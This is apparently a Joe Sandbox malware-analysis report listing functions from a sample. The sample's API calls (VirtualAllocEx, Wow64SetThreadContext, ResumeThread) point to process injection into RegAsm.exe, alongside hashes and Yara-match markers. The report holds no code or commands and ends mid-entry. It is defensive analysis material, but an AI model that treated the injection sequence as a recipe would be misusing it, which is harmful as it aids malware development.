Function 002C9650 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 002CA9FF

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 222bb02d61604917d45e106b4406c41086463303562ecea6ac8add129471dfcc
Instruction ID: d8b73126be8fdf7dcfa077c236e9c93d7d36b832c7621789ab51be8b56aeb9eb
Opcode Fuzzy Hash: 222bb02d61604917d45e106b4406c41086463303562ecea6ac8add129471dfcc
Instruction Fuzzy Hash: 1E2103B59103099FCB10CF9AC884BDEBBF5FB48310F108529E918A7240D374A954CBA5

Function 002C9638 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(02779214,00000000), ref: 002CA92F

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8c15e2083daa2374bf176b1a6b4168539b69228616109d6542cbc00513a96885
Instruction ID: 49efd7a405fcdda03cf4952a692f45a6a214d56106679cd11e15f70ae339bda2
Opcode Fuzzy Hash: 8c15e2083daa2374bf176b1a6b4168539b69228616109d6542cbc00513a96885
Instruction Fuzzy Hash: C92147B1D102199FCB10CF9AC845BEEFBF4EB08324F51822AD818B7340D378A954CBA1

Function 002C9680 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(02779214,00000000), ref: 002CA92F

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c69cce41f048f1c4d71e98a3462ac056ed092aebf8f22dabdd7aeffed2df65f8
Instruction ID: 49ae41c9f63cdaf2801f5a743c0033bb5651145e71091a1eab3e5ba59e790938
Opcode Fuzzy Hash: c69cce41f048f1c4d71e98a3462ac056ed092aebf8f22dabdd7aeffed2df65f8
Instruction Fuzzy Hash: BC2127B1D106199FCB10CF9AC845BAEFBB4EB48324F55826AD818B7340D378A954CBA1

Function 002CA8B0 Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(02779214,00000000), ref: 002CA92F

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 85265f476c0aaca72a56fcdd03146f650f6f02f6059113211ec25f98cb9c179f
Instruction ID: 1b25e0e78fbee5837310cda2048cf585200c816e96f2430a4a05d20795fd1bc7
Opcode Fuzzy Hash: 85265f476c0aaca72a56fcdd03146f650f6f02f6059113211ec25f98cb9c179f
Instruction Fuzzy Hash: 1C2165B1D0021A9FCB10CF9AC8857AEFBB0AF09320F15812AD818B7340D338A944CFA1

Function 002C9668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 002CAABB

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a493ffe700ba56ed02dca078272b8b0afab94bab64eea30a5561fbdadfb8be63
Instruction ID: c7c6a5c94fbe42c9124dff6ab011505577e7a92415da11070532321e3a959f1d
Opcode Fuzzy Hash: a493ffe700ba56ed02dca078272b8b0afab94bab64eea30a5561fbdadfb8be63
Instruction Fuzzy Hash: 801123B59103489FCF10CF9AC984BEEFFF4EB88320F208419E919A7210C374A954CBA1

Function 002C9698 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(02779214), ref: 002CB047

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2f8c3c0b8e1770b9e55e3caeecbbb13c8f86e6b91dc09ef9fd335cc5d876bab2
Instruction ID: 15e63503f2998912356f29a4f1402c0d74f9a6ff5a2b544ff4b538f872214928
Opcode Fuzzy Hash: 2f8c3c0b8e1770b9e55e3caeecbbb13c8f86e6b91dc09ef9fd335cc5d876bab2
Instruction Fuzzy Hash: 611125B19103098FCB10DF9AD448BEEFBF4EB49320F20856AD519A7750C374A944CFA5

Function 002CAFE1 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(02779214), ref: 002CB047

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 23c4897854f94b110535b3e73e9dc8fa4336193604729dd8f653a2f9d835651f
Instruction ID: 9f97914e4d8ffdd03f034e85e737107a9f8f1d669091da15d651a4aee29ef544
Opcode Fuzzy Hash: 23c4897854f94b110535b3e73e9dc8fa4336193604729dd8f653a2f9d835651f
Instruction Fuzzy Hash: FE1113B19002498FCB10CF9AD488BEEFBF5AB89324F24846AD459A3250C374A944CFA5

Non-executed Functions

Function 002C16D0 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5c0b3870745cfc4cdb331cde7d8d92e17319ab56002bc0618bf5c7bbeb116a5
Instruction ID: fd5d06a05e50b9e119c82450a44a4ab14d3a085167cc1cf1446e6a1f61b30724
Opcode Fuzzy Hash: a5c0b3870745cfc4cdb331cde7d8d92e17319ab56002bc0618bf5c7bbeb116a5
Instruction Fuzzy Hash: FB516D71A102498FDB05EFB9E85579EBFF2BF88300F44C529D0089B269EB349949CF90

Function 002C1A60 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52648c20d5c31b285c472fb586ad934616eb243982c88f485e2bc91a16bfad52
Instruction ID: 788fdec9bee84b2847c7a9cf80d996231a81b5c8dcd18006a937aa8feb308482
Opcode Fuzzy Hash: 52648c20d5c31b285c472fb586ad934616eb243982c88f485e2bc91a16bfad52
Instruction Fuzzy Hash: 784143B1E116588BEB1CCF6B8D4478EFAF7AFC8304F14C1BA950DA6255EB7009558F14

Analysis Process: RegAsm.exePID: 3396, Parent PID: 3316COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	7.4%
Total number of Nodes:	95
Total number of Limit Nodes:	7

Executed Functions

Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C597

Memory Dump Source

Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
Instruction ID: 1d949b529eabaabdef27e6558712febaa9fe5fb270f3c28a710670586d94b21d
Opcode Fuzzy Hash: 96f056240fafe685daf6fa55bc1be0920503d8e12ced685b7f3f31ef0593642a
Instruction Fuzzy Hash: 6AE04F766042147BD610FA5ADC01F9B77ACDFC5714F40441AFE0867141C675791186A4

Function 022F07AC Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 022F07B7

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Function 022EFAE8 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 022EFAF3

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Function 022EFB68 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 022EFB73

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Function 022EF9F0 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 022EF9FB

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Function 022EFDC0 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 022EFDCB

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F133F3,00000007,00000000,00000004,00000000,00416EEC,000000F4), ref: 0042C90F

Memory Dump Source

Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
Instruction ID: a1d5e44e419c5f43a953c6024c3edd79cc08c06400655d89eb787496dd1df9ae
Opcode Fuzzy Hash: ceab812759e8158de5a5ac84d472db0a12d41cfdbf74905a48891567a58fb3ad
Instruction Fuzzy Hash: 70E06DB56042047BD610EE59DC41E9B77ACDFC9714F004419FA08A7241CA74B9108BB4

Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E484,?,?,00000000,?,0041E484,?,?,?), ref: 0042C8C2

Memory Dump Source

Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
Instruction ID: b590f83acaf36a29023c807d359efb1fd208aa40abbca26474ac6304e8d45e96
Opcode Fuzzy Hash: fcfa1a01d57513169263ffc7a4ff84fc11524f1f96e112cbaab84027832a42ee
Instruction Fuzzy Hash: 5FE06DB56042047BCA10EE99EC41E9B73ACDFC4714F00441AFA08B7241D674B9108AB4

Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNELBASE(?), ref: 0042C957

Memory Dump Source

Source File: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
Instruction ID: 974abf2e9af91e9e83b3f33a5918f389266a5b4bdd13027a746a45c35a0aad57
Opcode Fuzzy Hash: 3dd16e71390a05461ac9c330b6713ed5c034b65982e4cb0efbd5251f43070572
Instruction Fuzzy Hash: 0AE026353102007BD510FA5ADC01F97775CDFC5710F400419FA487B242C671790083F1

Non-executed Functions

Function 023026F8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: d5e191073753f4129abe4c9b9dae8da843f55e3da0371e1b32378f38e52ed69c
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: CDF0FF213241499BCB48EA1C89A866B33D6EB94B04F54C038AE49C7686D631B900C7A0

Function 02340101 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
Instruction ID: 58832f0527b2fbe4ec68a1fbd7a19306fe0b7839bd31de057ab189ffd1885d65
Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
Instruction Fuzzy Hash: 30F012763502049FDB5CCF14C490BB977F6AB80719F1444ACEA0B8FA91DB35F942CA55

Function 022F0060 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Function 022F0078 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Function 022F0048 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Function 022F00C4 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Function 022F10D0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

